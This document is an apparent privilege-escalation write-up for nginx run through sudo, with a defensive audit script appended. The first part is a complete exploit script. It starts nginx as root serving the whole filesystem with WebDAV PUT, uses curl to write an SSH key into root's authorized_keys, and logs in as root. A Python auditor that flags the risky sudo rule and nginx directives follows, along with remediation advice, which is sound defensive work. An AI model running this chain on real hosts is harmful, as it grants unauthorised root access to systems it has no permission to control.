Condition: you must have sudo permission on nginx:

```
user@host:~$ sudo -l
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User user may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
```
From an existing interactive session, create the following exploit code and save it as `exploit.sh`:

```bash
#!/bin/bash
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
    worker_connections 768;
}
http {
    server {
        listen 1339;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat ~/.ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat ~/.ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"
```
Then run the exploit:

```bash
./exploit.sh
```
Store the displayed SSH private key (here as `root_key`), then use it to connect to the host:

```bash
chmod 600 root_key
ssh -i root_key root@host
```
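As an added defensive check, not part of the original write-up, the following Python script audits a host for the two conditions the chain above depends on: a sudo rule that lets a user run nginx as root with arguments of their choosing (nginx accepts any config file through `-c`), and an nginx configuration whose directives turn the server into a root-level file writer. The `sudo -l` text and both nginx configurations are constructed samples; the weak one mirrors the directives used above, and the hardened one shows the settings an administrator would use instead.

```python
import re
from typing import Dict, List

# Constructed sample of `sudo -l` output, shaped like the one in the write-up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin, use_pty
User user may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    (root) /usr/bin/systemctl restart nginx
"""

# Constructed nginx configuration with the directive combination the write-up relies on.
WEAK_NGINX_CONF = """\
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events { worker_connections 768; }
http {
    server {
        listen 1339;
        root /;            # serves the whole filesystem
        autoindex on;
        dav_methods PUT;   # accepts uploads as the worker user
    }
}
"""

# Constructed hardened counterpart: unprivileged worker, confined root, no WebDAV.
HARDENED_NGINX_CONF = """\
user www-data;
worker_processes auto;
events { worker_connections 768; }
http {
    server {
        listen 80;
        root /var/www/html;
        autoindex off;
    }
}
"""

# One `sudo -l` command line: "(runas) TAG: cmd [args], cmd [args]".
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}


def risky_sudo_rules(sudo_l_output: str) -> List[str]:
    """Return sudo command specs that let the caller start nginx as root with a
    config of their choosing. A rule with no pinned arguments (sudo then accepts
    any) or with a wildcard lets the caller pass -c; NOPASSWD is irrelevant."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m or not re.search(r"\b(ALL|root)\b", m.group("runas")):
            continue
        for spec in m.group("cmds").split(","):
            words = spec.split()
            if not words or not words[0].endswith("/nginx"):
                continue
            args = words[1:]
            if not args or any("*" in a for a in args):
                findings.append(" ".join(words))
    return findings


def dangerous_nginx_directives(conf: str) -> List[str]:
    """Flag the directives that make a reachable nginx a root-level file writer:
    root worker processes, a document root at /, and WebDAV write methods."""
    text = re.sub(r"#[^\n]*", "", conf)  # strip comments before matching
    issues = []
    if re.search(r"(?m)^\s*user\s+root\b[^;]*;", text):
        issues.append("user root: worker processes run as root")
    if re.search(r"(?m)^\s*root\s+/\s*;", text):
        issues.append("root /: the whole filesystem is the document root")
    for m in re.finditer(r"(?m)^\s*dav_methods\s+([^;]+);", text):
        enabled = sorted(WRITE_METHODS & set(m.group(1).split()))
        if enabled:
            issues.append("dav_methods: write methods enabled (" + ", ".join(enabled) + ")")
    return issues


def audit(sudo_l_output: str, nginx_conf: str) -> Dict[str, List[str]]:
    """Combine both checks into one report keyed by subsystem."""
    return {
        "sudo": risky_sudo_rules(sudo_l_output),
        "nginx": dangerous_nginx_directives(nginx_conf),
    }


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_NGINX_CONF), ("hardened", HARDENED_NGINX_CONF)):
        print(f"[{name} config]")
        for section, items in audit(SAMPLE_SUDO_L, conf).items():
            print(f"  {section}: {items or 'no findings'}")
```

The remediation the check implies is the same on both sides: drop the nginx sudo rule (or pin it to an exact argument list such as `/usr/sbin/nginx -t`, which sudo then refuses to extend with `-c`), and never ship a served configuration that combines `user root`, `root /` and write-capable `dav_methods`.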
- Exploit write-up: GRILL Dylan
- Based on Darren Martyn's exploit: https://darrenmartynie.wordpress.com/2021/10/25/zimbra-nginx-local-root-exploit/